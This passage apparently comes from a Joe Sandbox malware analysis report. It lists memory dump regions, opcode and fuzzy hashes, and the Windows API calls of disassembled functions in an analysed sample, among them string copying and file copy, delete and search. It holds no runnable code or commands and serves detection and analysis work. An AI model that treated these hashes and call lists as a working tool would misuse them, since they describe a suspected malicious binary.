                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: E2r$_zW
                                • API String ID: 0-2800289764
                                • Opcode ID: 02c2f734af9e7d99ae38fa77170512d8dd3c01a2191f8a5e062cf21b664c996c
                                • Instruction ID: b4084d32ec56ccb68f31e192b5494f84c451595d3bdc6190df60dcc7c189fa74
                                • Opcode Fuzzy Hash: 02c2f734af9e7d99ae38fa77170512d8dd3c01a2191f8a5e062cf21b664c996c
                                • Instruction Fuzzy Hash: C86125F3E082145BE3086D2DEC95776B7CAEF90720F2B463DEA9497384E8795C0582D6
                                Function 0091EE2D Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: rk&$rk&
                                • API String ID: 0-2442970839
                                • Opcode ID: 9b90b29649e72ee13aaa14da88d229cb79f8ddadf5731f53e49631000ebd4e58
                                • Instruction ID: 02a372b0a5dba8d05c15ad0ce066e5198fc48833c2d144e81277a5f80c38b555
                                • Opcode Fuzzy Hash: 9b90b29649e72ee13aaa14da88d229cb79f8ddadf5731f53e49631000ebd4e58
                                • Instruction Fuzzy Hash: 1341E4B290C2149FE705BF5CDCC176AB7E9EF58320F16092DEAD987340E63569208697
                                Function 0091EAC3 Relevance: .2, Instructions: 220COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f1c48823fba4c7aae9cea3248e0d7806dcd29e4855b908ed4154bc6bd78fcab2
                                • Instruction ID: ae3a170c023a4d0f428bea541e82e4dbfa8563a865da428176ee9c4968cf9ed5
                                • Opcode Fuzzy Hash: f1c48823fba4c7aae9cea3248e0d7806dcd29e4855b908ed4154bc6bd78fcab2
                                • Instruction Fuzzy Hash: D171D2B660C708DFD308AF29D85567AFBE8EF94710F26492EE5C683740E63558808B93
                                Function 0080C087 Relevance: .2, Instructions: 204COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7eca5f39c13b49edf3cc1c480b3691b9b8255d6d12295db2f1699dd2eced03ee
                                • Instruction ID: 136b6a6fd5ec1a1b01945854e36f906eaf12349cccecc4e3a99b4cfe543c85a6
                                • Opcode Fuzzy Hash: 7eca5f39c13b49edf3cc1c480b3691b9b8255d6d12295db2f1699dd2eced03ee
                                • Instruction Fuzzy Hash: C45186B3A0C3045FE3046E3DED9677ABBD5EF90720F1A853DEA8487744E97669018782
                                Function 008782DF Relevance: .2, Instructions: 200COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 849069d60189830d5b1b09da8173e9dd526c48a866dfe63dc4f5daadb61e4366
                                • Instruction ID: 37695bd4410f7bda470cc51ef39a159804a3a6fdf7145fc0f03ea6e71895ef22
                                • Opcode Fuzzy Hash: 849069d60189830d5b1b09da8173e9dd526c48a866dfe63dc4f5daadb61e4366
                                • Instruction Fuzzy Hash: 755136B3B082145FF3045A2DEC95B7B77D9DBD4720F2A453DEA88D7380E8799C014292
                                Function 007461BA Relevance: .2, Instructions: 172COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7b1b029a3fd9e24f368136211de6d8db5182d72ab1d645dd1115f65650207785
                                • Instruction ID: 412fd945f5e4c7d7d0b936f7f4009ba0172b5fed57beb7f91d33c4ad5528d549
                                • Opcode Fuzzy Hash: 7b1b029a3fd9e24f368136211de6d8db5182d72ab1d645dd1115f65650207785
                                • Instruction Fuzzy Hash: D851C2B36183109FE3186E68DC957BABBD9EB88320F16053DE7C587780E9755800879A
                                Function 007A9278 Relevance: .1, Instructions: 140COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c84ff43bdd6b8aa17d2b624186e8d9e30806cdc311a0ec3ffaa1121a7effad7
                                • Instruction ID: 123c914a191a28e6f98a93242876ea2bbad0092e89d05ad7a585b62fdbf2e208
                                • Opcode Fuzzy Hash: 5c84ff43bdd6b8aa17d2b624186e8d9e30806cdc311a0ec3ffaa1121a7effad7
                                • Instruction Fuzzy Hash: 5441D6B3A0C2109BE3147A28EC467BABBE5EF54320F16453DDBC5C7780EA79984586C7
                                Function 0072C622 Relevance: .1, Instructions: 120COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fee8ec444139de76d89082e7bb9ade4727c9f21ba42a93b9352c12ec7efe6609
                                • Instruction ID: 583d1fff27be13296cb092eae1d8478d61058cd8688ee0f0e375bbc2617b1662
                                • Opcode Fuzzy Hash: fee8ec444139de76d89082e7bb9ade4727c9f21ba42a93b9352c12ec7efe6609
                                • Instruction Fuzzy Hash: B23159F364C2045FF308A929EC8577AB7D6DBC8320F16863DD688C7744E9795C058696
                                Function 00739105 Relevance: .1, Instructions: 117COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 56fe6bffe377b2d84d62db91358cbb86a4efe0fe1ff14f2e5886ceef6aa8d873
                                • Instruction ID: e4d4396365ef3d0aba169f624f76dc15858e888e979a77233fd7fbbfc4a89fc0
                                • Opcode Fuzzy Hash: 56fe6bffe377b2d84d62db91358cbb86a4efe0fe1ff14f2e5886ceef6aa8d873
                                • Instruction Fuzzy Hash: 7631E5F36086089FE3087E3DEC8563AFBE5EF90220F16493EDAC5C3340EA3559458646
                                Function 004E85B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 004E8636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 004E86AA
                                • StrStrA.SHLWAPI(?,00CFF438), ref: 004E86CF
                                • lstrcpyn.KERNEL32(007093D0,?,00000000), ref: 004E86EE
                                • lstrlen.KERNEL32(?), ref: 004E8701
                                • wsprintfA.USER32 ref: 004E8711
                                • lstrcpy.KERNEL32(?,?), ref: 004E8727
                                • StrStrA.SHLWAPI(?,00CFF450), ref: 004E8754
                                • lstrcpy.KERNEL32(?,007093D0), ref: 004E87B4
                                • StrStrA.SHLWAPI(?,00CFF798), ref: 004E87E1
                                • lstrcpyn.KERNEL32(007093D0,?,00000000), ref: 004E8800
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                • Opcode ID: 2e632af7ae6c6141896e252b4a86bd1f76ae010a8d1709b02d99416b45199960
                                • Instruction ID: 1d2184a11e6eca0cec45b94c405ea4318490af749ed718bbef30c835a53ae5ca
                                • Opcode Fuzzy Hash: 2e632af7ae6c6141896e252b4a86bd1f76ae010a8d1709b02d99416b45199960
                                • Instruction Fuzzy Hash: C0F17E71A01119EFCB10DB64DD48A9BB7B9EF48300F108659EA49E7351DF78AE01CFA9
                                Function 004D1F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D1F9F
                                • lstrlen.KERNEL32(00CF9330), ref: 004D1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 004D1FE3
                                • lstrlen.KERNEL32(00501794), ref: 004D1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D200E
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D204D
                                • lstrlen.KERNEL32(00501794), ref: 004D2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D2075
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D2081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D20AC
                                • lstrlen.KERNEL32(?), ref: 004D20E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D2104
                                • lstrcat.KERNEL32(00000000,?), ref: 004D2112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D2139
                                • lstrlen.KERNEL32(00501794), ref: 004D214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D216B
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D2177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D21A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D21D4
                                • lstrlen.KERNEL32(?), ref: 004D21EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D220A
                                • lstrcat.KERNEL32(00000000,?), ref: 004D2218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D2242
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D227F
                                • lstrlen.KERNEL32(00CFDEF0), ref: 004D228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D22B1
                                • lstrcat.KERNEL32(00000000,00CFDEF0), ref: 004D22B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D22F7
                                • lstrcat.KERNEL32(00000000), ref: 004D2304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004D2356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D2382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D23BF
                                • DeleteFileA.KERNEL32(00000000), ref: 004D23F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004D2444
                                • FindClose.KERNEL32(00000000), ref: 004D2453
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
